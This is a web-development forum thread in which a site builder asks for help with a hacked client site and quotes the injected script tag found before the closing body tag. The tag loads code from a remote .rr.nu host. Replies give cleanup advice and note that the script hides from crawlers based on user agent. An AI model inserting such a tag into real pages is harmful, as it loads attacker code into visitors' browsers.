Hacked/Infected files

Permalink
Hello,

One of the sites I built (www.superiorsteelroofing.com) seems to have been infected with some kind of injection script. I have checked through the theme and core files and can't seem to find where on earth the script is attached.

Any ideas where I would look to find and remove this?

Here is the code that's right at the bottom before the closing body tag:

<script src="http://thurse88eksfact.rr.nu/nl.php?p=d"></script>


Thanks for your help with this!

iTrendesign
 
Mnkras replied on at Permalink Reply
Mnkras
Scan your computer and anyone else's computer that uses ftp to connect to the website, that is usually the cause, change all your webhost passwords, ask your host if they can scan for that, because it could be anywhere if your ftp was compromised.

Mike
xaritas replied on at Permalink Best Answer Reply
Definitely a problem with your host, Dreamhost, assuming that you secured everything after the major breach they had back in January-ish. See this exchange:
http://webmasters.stackexchange.com/questions/26475/is-someone-hija...

It is possible for the web server itself to insert HTML, so it may not have anything to do with your site (you can check this though by copying your site to a host you can secure, or comparing checksums with a known good installation).

Interestingly, this malware is sniffing based on the User Agent. It only appears when using known browser agents. I assume to get around search engine crawlers finding it.

In any case, you should file a ticket with Dreamhost.
iTrendesign replied on at Permalink Reply
iTrendesign
Thank you both for your help and advice. I will be having my client contact their host right away!
fastcrash replied on at Permalink Reply
fastcrash
all your site is really cool, i like them all
iTrendesign replied on at Permalink Reply
iTrendesign
Thank you very much. Your kind words are very much appreciated. We are a little behind updating some more recent sites we've worked on but hope to get them up to share very soon!
xaritas replied on at Permalink Reply
If you find out what the source was please post back here. I use Dreamhost for some things so I'm curious what they do about it.